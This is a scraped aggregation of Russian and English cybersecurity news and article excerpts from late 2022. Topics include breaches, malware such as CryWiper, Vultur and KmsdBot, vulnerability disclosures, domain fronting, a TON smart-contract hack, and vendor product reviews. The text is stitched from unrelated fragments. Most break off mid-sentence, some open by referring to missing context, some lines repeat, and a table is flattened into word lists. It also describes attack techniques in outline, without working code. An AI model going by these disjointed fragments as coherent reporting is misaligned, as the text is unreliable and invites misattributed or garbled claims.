Более 60 таких ресурсов были нацелены на российских болельщиков.

Новый законопроект вводит термин в законодательстве и увеличивает ответственность компаний за утечки.

Американская компания Cloudflare нашла способ обойти сетевую защиту Китая.

Киберпреступники проникли в облачное хранилище компании, используя данные из августовского взлома.

В документе описаны требования в отношении трансграничных линий связи и подключённых к ним средств связи, которые входят в состав сети связи общего пользования.

16 ноября 2021 года Минцифры пояснило , какие именно данные будет собирать Роскомнадзор о трансграничных линиях связи и средствах связи, которые к ним подключены.

Так, до 1 июня 2023 года ответственные лица должны предоставить Роскомнадзору следующую информацию:данные о собственнике или ином владельце линии связи, пересекающей госграницу РФ;сведения о линии связи, включая наименование, тип линии связи, сведения об оконечных узлах линии связи на территории РФ и иностранного государства, а также данные по их местонахождению;сведения о…

Вдохновляясь классической научной фантастикой, ученые создали сверхбыстрый модулятор света.

Компания использовала уязвимый алгоритм хеширования, поставив под угрозу миллионы аккаунтов клиентов.

Рекламные компании, владельцы приложений и сайтов считают, что могли лишиться до 40% рекламной выручки из-за доминирующего положения корпорации на рынке.

Технология поможет обездвиженным инвалидам управлять гаджетами с помощью силы мысли.

Жестокие интернет-мошенники выдают кредиты с «плавающими» условиямиAlexander AntipovПриложения микрозаймов пользовались большим успехом в развивающихся странах, где у людей ограниченные финансовые возможности.

Исследователи ИБ-компании Lookout обнаружили , что более 280 приложений в магазинах Google Play и App Store вовлекают пользователей в кредитные схемы с вводящими в заблуждение условиями, а затем вымогают деньги и преследуют жертв.

Система KYC в мошеннических приложенияхЗатем приложение предлагает вводящие в заблуждение или просто ложные условия кредита, чтобы заманить жертву.

Когда пользователь получает часть своего кредита, условия процентной ставки меняются или появляются скрытые ко…

CryWiper ликвидирует содержимое файлов всех форматов, за исключением тех, что отвечают за работу самой системы. Среди основных целей вируса — базы данных, архивы.

Вебинары состоятся 2 и 9 декабря в 11:00.

NVIDIA исправила 25 уязвимостей в драйверах GPU, некоторые из них потенциально опасны для систем.

При этом Москва предоставила властям Австралии возможность напрямую связаться с российскими коллегами для совместного поиска преступников.

Ожидается, что уже к 2025 году такие продукты будут распространены повсеместно.

Наши исследования показали, что на массовом рынке термин «кибериммунитет» впервые был представлен польской студией CD Projekt RED — создателем популярной компьютерной игры Cyberpunk 2077.

MILS: архитектура надёжной безопасности в режиме реального времениПоявлению архитектуры MLS (Multi-Level Security), прообраза MILS, предшествовала академическая разработка её концепции.

Поэтому было принято следующее решение: выделить механизм безопасности в отдельную архитектуру, получившую название MILS (Multiple Independent Levels of Security and Safety).

Первые кибериммунные решения уже внесены в реестр российского ПО в кла…

На практическом примере реализуем «мягкую миграцию» с межсетевого экрана FortiGate на российскую UTM-платформу Traffic Inspector Next Generation и акцентируем возможности шлюза в контексте ускоренного импортозамещения.

Внешний вид программно-аппаратного устройства Traffic Inspector Next Generation (модель M1000)В Traffic Inspector Next Generation представлено более 80 функций по защите сети, организации и контролю доступа пользователей.

Пример размещения Traffic Inspector Next Generation SaaS в облачной инфраструктуреОсобенности Traffic Inspector Next Generation в контексте импортозамещенияИз числа западных аналогов аппаратно-программной UTM-платформы Traffic Inspector Next Generation можно…

Экосистемы в кибербезопасности — это…Зависимость от одного вендораИнтересная дискуссия развернулась в студии по поводу опасений заказчиков попасть в зависимость от одного производителя средств информационной безопасности (vendor lock-in).

Но даже несмотря на это стоимость экосистемы в целом должна получаться ниже, чем сумма цен входящих в неё продуктов.

Размер скидки и бонусов, как и в предыдущем опросе, зрители прямого эфира не посчитали важным мотивом для покупки.

Иван Чернов:— Рынок может вместить две-три хорошие экосистемы и десяток плохих, которые никто не будет покупать, и они исчезнут.

Создание собственной экосистемы — не в интересах государства, поскольку пока регулирование с его ст…

Архитектура X-Config и системные требованияСистема X-Config может быть развёрнута как на реальных серверах, так и на виртуальных машинах.

Ядро системы X-Config Server устанавливается на Unix-подобную систему и осуществляет анализ собираемых конфигураций, проверку соответствия профилям стандартов и генерацию отчётов.

Есть возможность отходить от требований стандартов в соответствии с реальным режимом использования контролируемых ресурсов и с принятой в организации политикой информационной безопасности.

Для каждого проверенного узла отображается информация о соответствии конфигурации профилю, классифицированная по категориям (разделам требований), стандартам (исследуемому ПО) и по ресурсам.

В…

К большей из них относятся рядовые сотрудники, подключающиеся к корпоративной сети для доступа к определённым информационным системам, необходимым им для выполнения должностных обязанностей.

Для решения этих проблем за счёт контроля работы пользователей с расширенным набором прав существует отдельный класс решений — системы управления привилегированным доступом (Privileged Access Management, PAM).

В обзор российского рынка систем управления привилегированным доступом мы включили следующие разработки:Indeed Privileged Access Manager.

Зарубежные системы управления привилегированным доступомARCON Privileged Access ManagementКомпания ARCON предлагает заказчикам собственную систему Privileged Ac…

Необходим ли экосистемный подход при строительстве систем безопасности для АСУ ТП?

Если для АСУ ТП используется компьютерная система, то для неё характерны те же риски, которые существуют для обычных ИТ-систем.

Защита российских промышленных предприятийЛегенда об абсолютной защищённости АСУ ТП благодаря «воздушному зазору» долгое время позволяла не заниматься фактической защитой АСУ ТП, а ограничиваться «бумажной» безопасностью.

Оно имеет непосредственное отношение и к АСУ ТП и их средствам безопасности.

Минимальный набор аппаратных и программных средств ИБ для защиты АСУ ТПЧто необходимо внедрить, чтобы обеспечить базовый уровень защиты АСУ ТП?

Solar webProxy ставится «в разрыв» сети и контролирует все данные, передаваемые между сотрудниками, внутренними ресурсами организации и интернет-ресурсами.

В Solar webProxy есть внутренний антивирусный модуль от Dr.Web.

Интеграция Solar webProxy с SIEM-системами осуществляется в части настройки удобного для SIEM формата регистрации событий, а также отправки этих журналов в SIEM-систему средствами Syslog.

Эта рекомендация касается интеграции с DLP; с антивирусами ситуация обратная — они оптимизированы и «заточены» на проверку всех файлов, включая служебные.

С решением любых вопросов по развёртыванию, конфигурированию, эксплуатации Solar webProxy и интеграции с внешними ИБ-системами команда «…

Требования заказчиков к «пилоту» Secure Web GatewayВыбирая отечественное SWG-решение, заказчикам крайне важно на практике убедиться, что по функциональности оно будет практически идентичным решению западного вендора, которым они привыкли пользоваться.

Отдельно формируется перечень типовых правил, который инженер переносит в Solar webProxy совместно со специалистами заказчика, попутно консультируя их.

В Solar webProxy реализованы возможности интеграции со всеми вышеперечисленными классами решений.

В Solar webProxy для интеграции с DLP-системами реализована возможность передавать трафик по протоколу ICAP, для интеграции с SIEM-системами — по протоколу Syslog.

Такой подход сразу даст чёткую ка…

Повсеместный мобильный доступ к ресурсам корпоративной сети привлекателен для различного рода атак на инфраструктуры предприятий.

Узнаем, какова специфика работы систем обнаружения целевых атак на конечных точках сети (Endpoint Detection and Response, EDR) для защиты мобильных устройств.

Можно даже сказать, что все возможные векторы атак на рабочие станции являются лишь подмножеством атак на мобильные устройства — из-за наличия там множества датчиков (камера, GPS и др.

), прав «администратора», ограниченных возможностей антивирусного ПО и неконтролируемого подключения устройства к различным беспроводным сетям.

Потребности в защите мобильных устройств с появлением смартфонов стали закрыватьс…

Группы доступа могут применяться как к отдельным целевым системам и учётным записям, так и к типам целевых ресурсов и аккаунтов.

Настройка подключения к различным веб-интерфейсам производится через основной веб-интерфейс Senhasegura, на рисунке показаны параметры для запуска сессии доступа к WebSphere.

Функция «just-in-time» для учётных записейУправление привилегированными задачамиОчень часто пользователям нужно выполнять в целевых системах типовые действия, и для этого они каждый раз открывают сеанс доступа с записью и с необходимостью анализа.

Внедрение платформы управления привилегированными пользователями Senhasegura позволяет минимизировать указанные негативные последствия за счёт умен…

Каковы основные методики и подходы в этой области и как на требованиях по безопасности кода сказались актуальные события?

ВведениеЭфир AM Live от 9 ноября 2022 года был посвящён теме безопасности исходного кода и его анализа силами самих разработчиков.

Проверка безопасности кодаЖизненный цикл SDLC предполагает, что в оценке безопасности кода будут принимать участие разные команды: вендор, заказчик, партнёры.

Инструменты для проверки кода на безопасностьЖивой интерес среди участников дискуссии вызвала тема выбора инструментов для проверки кода на безопасность.

В среде ИБ нередко можно встретить различные аббревиатуры, часть из которых активно используются в задачах проверки безопасности кода.

Позднее выяснилось, что в действительности легальные Android-приложения содержали внутри себя функцию дополнительной загрузки, которая обеспечивала установку банковской троянской программы Vultur, клона SharkBot.

Те маскируются как служебные и не проявляют враждебной активности.

Изучение механизма доставки троянской программы Vultur через дроппер показало, что злоумышленники применили следующие техники: стеганография, удаление временных файлов и обфускация.

Злоумышленники не остановились на этом и записывают свой код в зашифрованном сжатом виде, что ещё больше затрудняет его распознавание и оценку.

Этапы установки Vultur через дропперУстановленное вредоносное приложение не несёт угрозы в сл…

Функциональные возможности «СКДПУ НТ Мониторинг и аналитика»Комплекс разделов системы позволяет сотруднику ИБ-службы получать, анализировать, контролировать и обрабатывать весь поток событий, проходящий через установленный в организации шлюз доступа СКДПУ НТ.

Рассмотрим интерфейс консоли управления «СКДПУ НТ Мониторинг и аналитика» более подробно, а также изучим функциональные возможности системы детальнее.

Внешний вид окна веб-консоли СКДПУ НТ «Отчёты»Раздел «Персоны» — это просмотр цифровых профилей пользователей, работающих через шлюзы доступа СКДПУ НТ в течение рабочего времени.

Пример внешнего вида карточки инцидента в «СКДПУ НТ Мониторинг и аналитика»Раздел «Компоненты» предоставляет …

Однако после вынесения приговора в Рунете стали распространяться фейки, которые «переквалифицировали» его в «обвинение за использование VPN».

Использование статического IP-адреса наоборот указывает на то, что обвиненный желал точной собственной идентификации.

В содержательной части обвинения указывается, что пользователь в неопределенное время («в октябре 2018 года, не позднее 24 октября 2018 года») умышленно «использовал вредоносную программу Vipole».

Пользователь может получить статический адрес у провайдера Ростелеком только при условии, что он собственноручно подключит эту услугу в своем личном кабинете.

Связать концы с концамиОтсутствие среди участников суда представителя Ростелекома у…

Рассмотрим DevSecOps и наиболее актуальные и интересные сегодня практики безопасной разработки с точки зрения их влияния на бизнес, технологических и геополитических вызовов.

Методология позволяет командам безопасности идти в ногу с подразделениями разработки и эксплуатации в процессе создания современных приложений.

Многие компании замораживают использование новых библиотек и компонент Open Source, что в дальнейшем может привести к отставанию в технологическом развитии.

В MAST используются те же самые методы, что и в тестировании веб-приложений (SAST, DAST, IAST).

В целом технологический пул практик AppSec проявляет высокую чувствительность к современным трендам кибербезопасности и в резул…

Об этом аспекте и в целом об эволюции понятия «офис для ИТ-компании» в прямом эфире рассказала Мария Ахременкова, руководитель креативного отдела, партнер VOX Architects.

И в указанных регионах сейчас начинается большая борьба вендоров альтернативных ОС со всего мира.

Исключение, наверное, Китай, который перешел на свои операционные системы и ПО в сколько-нибудь значимых государственных объектах, а вслед за ними шагнул и весь китайский бизнес, крупный, средний и частично даже мелкий.

Она появляется из нашего личного опыта, который постепенно накапливается с момента рождения, и в голове создается ментальная модель закономерностей внешнего мира.

Доказательство было суперсложное и не могло быт…

Он написал несколько десятков собственных правил для поиска уязвимостей в C/C++, их можно найти в его github-репозитории.

Для реализации более подробных и сложных правил необходимо создать YAML-файл и в нём описать все необходимые условия.

severity: ERROR languages: - cpp pattern-either: - patterns: - pattern: | free($PTR); ... free($PTR); - pattern-not: | free($PTR); ... $PTR = $EXPR; ... free($PTR); - pattern-not-inside: | $FTYPE $FUNC(..., $TYPE $ARG, ...){ ... $ARG = $EXPR; ... } ... $FUNC($PTR); ... - pattern-not-inside: | if ($CONF){ ... goto $LAB; } ... free($PTR); ... $LAB: ... free(ptr); - patterns: - pattern: | if ($COND){ ... free($PTR); ... } ... free($PTR); - pattern-not: | if …

Расскажу, как я решился переехать на менеджер паролей, и какие шаги для этого предпринял.

Если вы всё ещё храните пароли в голове, этот знак свыше для вас.

Иначе менеджер паролей сразу покажется неудобной затеей.

Соберите свои паролиДаже если вы думаете, что не пользуетесь менеджером паролей, у вас наверняка они накопились.

Импортируйте пароли в выбранный менеджер, а затем навсегда удалите эти CSV-файлы.

Отметим, что в реальных банковских системах установлены более строгие, хотя и не всегда достаточные с точки зрения ИБ ограничения на отправку одноразовых паролей.

Интересно, что мы не заметили по логам, чтобы кто-то из участников в дальнейшем эксплуатировал ее для получения доступа к аккаунтам.

Ошибки округленияДругая интересная ошибка, которую мы добавляем в наш конкурс уже не в первый раз, — это ошибка округления.

Результаты задания на PHDays 11: участники, которые обнаружили предыдущую уязвимость, к сожалению, не обратили внимание на описанное ограничение и не попробовали его обойти.

Время ответа сервера тоже кратно увеличилось — это позволяет сделать вывод, что в этом функционале есть D…

К сожалению, Slack, Microsoft Teams и другие проприетарные решения не удовлетворяют требованиям по безопасности, а за коммерческие лицензии нужно платить.

В первую очередь потому, что организациям и частным лицам нужна приватность и надёжная безопасность в общении, основанная на открытых стандартах и стойкой криптографии.

Такая тенденция естественным образом повышает популярность Element/Matrix и других опенсорсных пакетов для коммуникаций, и это очень хорошо с точки зрения свободы и безопасности.Переход на надёжное опенсорсное ПО для корпоративных коммуникаций происходит и в государственных организациях, и в частных компаниях.

В Element даже разработали специальный инструмент миграции Slac…

В данной статье я хочу немного поговорить о такой старой и знакомой заядлым пентестерам теме как Domain fronting.

Как мы всею, надеюсь, знаем из школьных уроков криптографии, при таком подходе никто, кроме владельца закрытого ключа, т.е.

Подробнее про переход с ESNI на ECH на русском - https://tcinet.ru/press-centre/articles/7563/Переходим к водным процедурам (практическим занятиям)Прежде всего, давайте проверим в браузере как работает ECH.

Скажу лишь, что ничего особо нового тут не требуется, и для websocket я использовал те же стандартные подходы/библиотеки, что и для Rsocks.

Для того чтобы научить ligolo-ng работать с ECH необходимо использовать соответствующий форк GO от Cloudflare, обе…

– 256 с. И с тех пор употребляется повсеместно.

Если взглянуть на проблематику шире, то разумно интерпретировать анонимность в контексте таких базовых услуг безопасности, как конфиденциальность, подлинность и целостность.

Здесь мы видим, что анонимность и неотслеживаемость существуют сами по себе и никак не коррелируют.

Иными словами, злоумышленник может «вклиниться» между обособленными сессиями двух различных протоколов, идентификации и согласования ключа, и осуществить имперсонификацию, которую впоследствии невозможно обнаружить.

Также предпринята попытка исследования таких услуг безопасности, как анонимность и подлинность, которые, с одной стороны, состоят в фундаментальном противоречии,…

В TON часто проводятся различные конкурсы для разработчиков, контракт и взлом, который мы будем разбирать, как раз с одного из таких конкурсов.

В TON акторная модель смарт-контрактов, каждый смарт-контракт может получить одно сообщение, изменить собственное состояние или отправить одно, или несколько сообщений в единицу времени, таким образом взаимодействие происходит за счёт сообщений.

В конце смарт-контракта, происходит запись тела сообщения в регистр выходных действий с5 .

Хранилище данных в TON или регистр с4Для того чтобы "достать" данные из с4 нам понадобятся две функции из стандартной библиотеки FunC .

В соответствии с документацией виртуальной машины TON - TVM, когда на счете в одно…

Исследователи из Varonis Threat Labs обнаружили возможность SQL-инъекции и уязвимость логического доступа в Zendesk Explore, компоненте платформы Zendesk.

Если верить информации на сайте вендора, Zendesk используют в качестве решения для обслуживания клиентов более 100 000 компаний.

Исследователи обнаружили, что они могут использовать уязвимость для извлечения данных из Zendesk Explore, включая список таблиц из экземпляра службы реляционной базы данных Zendesk (RDS), а также всю информацию, хранящуюся в базе данных.

GraphQL — это относительно новый формат API, и после изучения его реализации в Zendesk исследователи обнаружили в Zendesk Explore интересный тип объекта с именем QueryTemplate ,…

Система кондиционирования зарезервирована по Tier-стандарту и организована по принципу «холодных» и «горячих» коридоров.

Кроме видеокамер по периметру, в помещениях, на входе в дата-центр, внутри зданий и над стойками А-ЦОД установлены датчики пожарной сигнализации.

Инфраструктура Управляемые сервисы Администрирование Данные Клиент Клиент Клиент Код Клиент Клиент Клиент Мониторинг Клиент Клиент Провайдер Прикладное ПО Клиент Клиент Провайдер Средства защиты Клиент Совместно Провайдер Системное ПО Клиент Клиент Провайдер Сеть Клиент Клиент Провайдер Работа инфраструктуры Провайдер Провайдер Провайдер Работа инфраструктуры Провайдер Провайдер Провайдер Физическая безопасность Провайдер Провай…

Он запускается на самых разных платформах, от Raspberry Pi до смартфонов, и для него есть инструкции и туториалы на любой случай жизни.

Parrot базируется на Debian и по концепции близок к Kali Linux, но предлагает больше предустановленного ПО для «мирного» повседневного использования.

Он основан на Gentoo Linux, так что дает опыт низкоуровневой настройки ОС и позволяет зарыться в нюансы компилирования ПО для взлома и реверс-инжиниринга.

ThreatPursuit VM, в свою очередь, предназначен для аналитиков и ориентирован на разведку, аналитику, сбор статистики и поиск и моделирование угроз.

Эта фича позволяет заново заблокировать загрузчик после установки ОС и таким образом закрывает множество векто…

Исследователи из ИБ-компании Akamai изучали ботнет, построенный на основе малвари KmsdBot, который использовался для майнинга криптовалюты и DDoS-атак.

Во время тестов эксперты случайно передали ботам команду с синтаксической ошибкой, что фактически отключило ботнет, и теперь хакерам придется восстанавливать его с нуля.

Как теперь рассказывают эксперты, к сожалению для разработчиков KmsdBot и к счастью для владельцев взломанных устройств, малварь пока не умеет «сохраняться» в зараженной системе, таким образом избегая обнаружения.

Эксперт Akamai Ларри Кэшдоллар пишет, что с тех пор как KmsdBot заразил одну из приманок компании, он и коллеги активно занимались его изучением.

Злую шутку с Kmsd…

Разработчики менеджера паролей LastPass (которым пользуются более 33 миллионов человек по всему миру) сообщили, что неизвестные злоумышленники взломали облачное хранилище компании и получили доступ к данным клиентов.

Тогда в компании сообщали, что неизвестные хакеры получили доступ к среде разработки, скомпрометировав учетную запись одного из сотрудников.

«Недавно мы обнаружили необычную активность в стороннем облачном хранилище, которым в настоящее время пользуются как LastPass, так и аффилированной компанией GoTo, — говорят в компании.

— Мы определили, что неавторизованная сторона, используя информацию, полученную в ходе инцидента в августе 2022 года, сумела получить доступ к некоторым да…

Некоммерческая организация Internet Security Research Group (ISRG), стоящая за Let's Encrypt, раскрыла статистику и сообщила, что в этом году открытый центр сертификации выпустил свой трехмиллиардный сертификат.

Напомню, что Let’s Encrypt бесплатно предоставляет сайтам цифровые сертификаты X.509, необходимые для включения HTTPS (SSL/TLS) и зашифрованной связи, с сентября 2015 года, когда был выпущен первый сертификат для домена helloworld.letsencrypt.org.

«По состоянию на 1 ноября 2022 года Let’s Encrypt предоставляет TLS более чем 309 млн доменов с помощью 239 млн активных сертификатов.

В 2022 году использование Let’s Encrypt возросло более чем на 33 мне доменов», — рассказали в ISRG.

И эт…

Компания Google подала иск против мошенников, которые выдавали себя за представителей Google и выманивали у пользователей деньги, якобы за продвижение профилей компаний в Google Поиске и Картах.

Пользователи сообщали, что мошенники требовали у них деньги за создание или «верификацию» профилей компаний, которые Google предоставляет бесплатно.

«Мошенники также создавали сайты, рекламирующие покупку фальшивых отзывов (как положительных, так и отрицательны), чтобы манипулировать отзывами в профилях компаний в Google Search и Maps.

В иске Google сообщается, что компания G Verifier зарегистрирована в Колумбусе, штат Огайо, и управляется человеком по имени Каушал Патель (Kaushal Patel).

Также в ис…

Еще 66 таких ресурсов нацелены на российских болельщиков — под видом розыгрыша призов на фейковой странице трансляций футбольных матчей у зрителей похищали деньги и данные банковских карт.

Исследователи рассказывают, что владелец сети вредоносных сайтов, которые под видом прямых трансляций c матчей перенаправляют пользователей на скаммерские и фишинговые ресурсы, известен под ником Kinohoot.

В итоге трансляция так и не начинается, а жертва теряет и деньги, и данные карты.

«Чтобы избежать блокировки сразу всех своих доменов, преступники оставляют активными только несколько сайтов, а остальные находятся в “спящем” режиме.

Помимо описанной схемы, решение Group-IB Digital Risk Protection обнару…

Во многих устройствах Dell, HP и Lenovo используются старые и небезопасные версии OpenSSL, предупреждают специалисты компании Binarly.

В итоге, по данным исследователей, прошивка, связанная с корпоративными устройствами Lenovo Thinkpad, использует сразу три разных версии OpenSSL (0.9.8zb, 1.0.0a и 1.0.2j), самая новая из которых была выпущена в 2018 году.

Более того, один из модулей прошивки (InfineonTpmUpdateDxe) и вовсе полагается на OpenSSL версии 0.9.8zb, выпущенной 4 августа 2014 года.

Помимо перечисленных версий OpenSSL, в некоторых прошивках Lenovo и Dell также задействована еще более старая версия (0.9.8l), которая была выпущена 5 ноября 2009 года.

Производитель Версия OpenSSL Дата …

Открылся предзаказ обновленной книги Криса Касперски «Фундаментальные основы хакерства», получившей подзаголовок «Анализ программ в среде Win64».

Пытливому уму хакера раскрываются не только методы анализа, взлома и защиты программ, но и особый образ мышления.

Рассказывается, как их применять для исследования и взлома простых защит, которые до сих пор часто встречаются в программах.

В результате обновления материала с учетом новой микропроцессорной архитектуры книга значительно потолстела и прибавила в весе по сравнению с оригинальным изданием.

С настоящей бумажной книгой ты сможешь вникать в основы хакерства, где бы ты ни был — на пляже или в землянке.

Трас­сировать уже трас­сиру­емый про­цесс не получит­ся (менее зна­чимое следс­твие — про­цесс не может трас­сировать сам себя, сна­чала он дол­жен рас­щепить­ся).

Трас­сировать уже трас­сиру­емый про­цесс не получит­ся (менее зна­чимое следс­твие — про­цесс не может трас­сировать сам себя, сна­чала он дол­жен рас­щепить­ся).

Про­цесс дол­жен иметь тот же самый UID, что и отла­жива­ющий про­цесс, и не быть про­цес­сом setuid/setduid (или отла­живать­ся катало­гом root[ kk8] ).

Про­цесс дол­жен иметь тот же самый UID, что и отла­жива­ющий про­цесс, и не быть про­цес­сом setuid/setduid (или отла­живать­ся катало­гом ).

— прек­раща­ет отладку про­цес­са с задан­ным PID (как по , так и по ) и в…

Дело в том, что в качестве начального вектора проникновения злоумышленники используют USB-устройства.

Известно, что атаки хакеров затронули ряд организаций государственного и частного секторов, в первую очередь в странах Юго-Восточной Азии, а также в США, Европе и Азиатско-Тихоокеанском регионе.

К примеру, в начале текущего года ФБР предупреждало, что хакеры попросту рассылают вредоносные USB-девайсы по почте, в надежде на любопытство сотрудников компаний-жертв.

После первоначального заражения систем через USB-устройство, хакеры используют бинарники с легитимными подписями для загрузки вредоносных программ на компьютеры жертв.

«Учитывая червеобразный характер этого вредоносного ПО, мы смогл…

8 декабря 2022 года в Москве пройдет еже­год­ная ана­лити­чес­кая кон­ферен­ция «Код ИБ ИТО­ГИ».

На мероприятии вновь соберется профессиональное ИБ-сообщество.

Модераторами и экспертами разных сессий выступят:Всеслав Соленик , независимый ИБ-эксперт;, независимый ИБ-эксперт; Артем Калашников , директор проекта Газпромбанк;, директор проекта Газпромбанк; Виталий Тереньтев , директор департамента социальных проектов Headhunter Group;, директор департамента социальных проектов Headhunter Group; Харитон Никишкин , коммерческий директор, соучредитель Secure-T;, коммерческий директор, соучредитель Secure-T; Сергей Рысин , главный специалист по технической защите Headhunter Group;, главный специал…

В Google Play Store обнаружили вредоносное приложение Symoo, якобы предназначенное для работы с SMS-сообщениями и насчитывающее более 100 000 загрузок.

По информации ИБ-специалистов, приложение использует доступ к SMS для создания учетных записей Microsoft, Google, Telegram и так далее.

К этому времени приложение усевает использовать номер телефона жертвы для создания учетных записей на различных онлайн-платформах.

Оно предлагает пользователям «онлайн-номера более чем из 200 стран», которые можно использовать для создания учетных записей.

Хотя подтверждений этому пока нет, предполагается, что Symoo используется для получения и пересылки кодов OTP, сгенерированных людьми в приложении Activat…

Интерпол объявил об аресте 11 человек, подозреваемых в причастности к скаму и фроду на сумму 800 000 долларов США.

Аресты были произведены в рамках операции, направленной на противодействие киберпреступности в Африке.

По данным Интерпола, в операции приняли участие правоохранительные органы 27 стран мира.

Официальный пресс-релиз гласит, что операция, проведенная в тесном сотрудничестве с Африполом, длилась с июля по ноябрь текущего года, «на фоне огромных финансовых потерь, понесенных компаниями, предприятиями и частными лицами».

Сообщается, что операцию поддерживали нескольких частных ИБ-компаний, включая British Telecom, Cyber Defense Institute, Fortinet, Group-IB, «Лабораторию Касперског…

The North Korea-linked ScarCruft group has been attributed to a previously undocumented backdoor called Dolphin that the threat actor has used against targets located in its southern counterpart.

Dolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control.

The latest findings from ESET shed light on a second, more sophisticated backdoor delivered to a small pool of victims via BLUELIGHT, indicative of a highly-targeted espionage operation.

"While the BLUELIGHT backdoor performs basic reconnaissance and evaluation of the compromised machine after exploitation, Dolphin is more sophisticated and manual…

New findings from cybersecurity firm JFrog show that malware targeting the npm ecosystem can evade security checks by taking advantage of an "unexpected behavior" in the npm command line interface (CLI) tool.

npm CLI's install and audit commands have built-in capabilities to check a package and all of its dependencies for known vulnerabilities, effectively acting as a warning mechanism for developers by highlighting the flaws.

Specifically, the problem arises only when the installed package version contains a hyphen (e.g., 1.2.3-a), which is included to denote a pre-release version of an npm module.

While the project maintainers treat the discrepancy between regular npm package versions and…

A malicious Android SMS application found on the Google Play Store has been found to stealthily harvest text messages with the goal of creating accounts on a wide range of platforms like Facebook, Google, and WhatsApp.

This is achieved by using the phone numbers associated with the infected devices as a means to gather the one-time password that's typically sent to verify the user when setting up new accounts.

]fun," which was previously used in another malicious application called Virtual Number (com.programmatics.virtualnumber) that has since been removed from the Play store.

The app's developer, Walven, has also been linked to another Android app known as ActivationPW - Virtual numbers (…

The French data protection watchdog on Tuesday fined electricity provider Électricité de France €600,000 for violating the European Union General Data Protection Regulation (GDPR) requirements.

The Commission nationale de l'informatique et des libertés (CNIL) said the electric utility breached European regulation by storing the passwords for over 25,800 accounts by hashing them using the MD5 algorithm as recently as July 2022.

It's worth noting that MD5, a message digest algorithm, is considered cryptographically broken as of December 2008 owing to the risk of collision attacks.

The probe also pointed fingers at EDF for failing to comply with GDPR data retention policies and for providing "…

The Australian government has passed a bill that markedly increases the penalty for companies suffering from serious or repeated data breaches.

"Significant privacy breaches in recent months have shown existing safeguards are outdated and inadequate," Attorney-General Mark Dreyfus said in a statement.

The legislation, called the Privacy Legislation Amendment (Enforcement and Other Measures) Bill 2022, also bestows more powers to the Australian Information Commissioner to address security breaches.

The "new information sharing powers will facilitate engagement with domestic regulators and our international counterparts to help us perform our regulatory role efficiently and effectively," Aust…

Researchers have disclosed details of three new security vulnerabilities affecting operational technology (OT) products from CODESYS and Festo that could lead to source code tampering and denial-of-service (DoS).

The vulnerabilities, reported by Forescout Vedere Labs, are the latest in a long list of flaws collectively tracked under the name OT:ICEFALL.

Another DoS shortcoming in Festo controllers (CVE-2022-3079, CVSS score: 7.5) relates to a case of unauthenticated, remote access to an undocumented web page ("cec-reboot.php") that could be exploited by an attacker with network access to Festo CPX-CEC-C1 and CPX-CMXX PLCs.

"This is yet another example of a supply chain issue where a vulnera…

A threat actor with a suspected China nexus has been linked to a set of espionage attacks in the Philippines that primarily relies on USB devices as an initial infection vector.

An analysis of the artifacts used in the intrusions indicates that the campaign dates as far back as September 2021.

"However, even when targeted organizations were based in other locations, the specific systems targeted by UNC4191 were also found to be physically located in the Philippines."

The reliance on infected USB drives to propagate the malware is unusual if not new.

The Raspberry Robin worm, which has evolved into an initial access service for follow-on attacks, is known to use USB drives as an entry point.

Acer has released a firmware update to address a security vulnerability that could be potentially weaponized to turn off UEFI Secure Boot on affected machines.

The PC maker described the vulnerability as an issue that "may allow changes to Secure Boot settings by creating NVRAM variables."

Credited with discovering the flaw is ESET researcher Martin Smolár, who previously disclosed similar bugs in Lenovo computers.

Disabling Secure Boot, an integrity mechanism that guarantees that only trusted software is loaded during system startup, enables a malicious actor to tamper with boot loaders, leading to severe consequences.

The BIOS update is expected to be released as part of a critical Window…

EdFinancial and the Oklahoma Student Loan Authority (OSLA) are notifying over 2.5 million loanees that their personal data was exposed in a data breach.

The target of the breach was Nelnet Servicing, the Lincoln, Neb.-based servicing system and web portal provider for OSLA and EdFinancial, according to a breach disclosure letter.

That exposed information included names, home addresses, email addresses, phone numbers and social security numbers for a total of 2,501,324 student loan account holders.

“With recent news of student loan forgiveness, it’s reasonable to expect the occasion to be used by scammers as a gateway for criminal activity,” Bischoping said.

Last week, the Biden administrati…

Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.

The threat actor, according to researchers, is believed to be the China-based APT TA423, also known as Red Ladon.

In lieu of malware, attackers can use ScanBox in conjunction with watering hole attacks.

Adversaries load the malicious JavaScript onto a compromised website where the ScanBox acts as a keylogger snagging all of a user’s typed activity on the infected watering hole website.

This allows ScanBox to connect to a set of pre-configured targets,” researchers explain.

The campaigns are tied to focused abuse of identity and access management firm Okta, which gained the threat actors the 0ktapus moniker, by researchers.

“These users received text messages containing links to phishing sites that mimicked the Okta authentication page of their organization.”Impacted were 114 US-based firms, with additional victims of sprinkled across 68 additional countries.

“The 0ktapus campaign has been incredibly successful, and the full scale of it may not be known for some time,” he said.

What the 0ktapus Hackers WantedThe 0ktapus attackers are believed to have begun their campaign by targeting telecommunications companies in hopes of winning access to potential targets’…

Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.

After a recent dip, ransomware attacks are back on the rise.

With data gathered by “actively monitoring the leak sites used by each ransomware group and scraping victim details as they are released,” researchers have determined that Lockbit was by far the most prolific ransomware gang in July, behind 62 attacks.

It may well be that the resurgence in ransomware attacks, and the rise of these two particular groups, are intimately connected.

Why Ransomware Has BouncedResearchers from NCC Group counted 198 successful ransomware campaigns in July – up 47 percent from June.

New research indicates that over 80,000 Hikvision surveillance cameras in the world today are vulnerable to an 11 month-old command injection flaw.

Hikvision – short for Hangzhou Hikvision Digital Technology – is a Chinese state-owned manufacturer of video surveillance equipment.

Last Fall, a command injection flaw in Hikvision cameras was revealed to the world as CVE-2021-36260.

According to David Maynor, senior director of threat intelligence at Cybrary, Hikvision cameras have been vulnerable for many reasons, and for a while.

Furthermore, IoT devices might not give users any indication that they’re unsecured or out of date.

Twitter is blasted for security and privacy lapses by the company’s former head of security who alleges the social media giant’s actions amount to a national security risk.

Twitter has responded alleging that Zatko is a “disgruntled employee” who was fired for poor performance and leadership.

This, according to Zatko, elevates his concerns to a matter of national security.

Twitter allowed some foreign governments “… to infiltrate, control, exploit, surveil and/or censor the ‘company’s platform, staff, and operations,” according to the redacted whistleblower report submitted to congress.

NEW: First time Twitter CEO @paraga weighs in on whistleblower story.

CISA is warning that Palo Alto Networks’ PAN-OS is under active attack and needs to be patched ASAP.

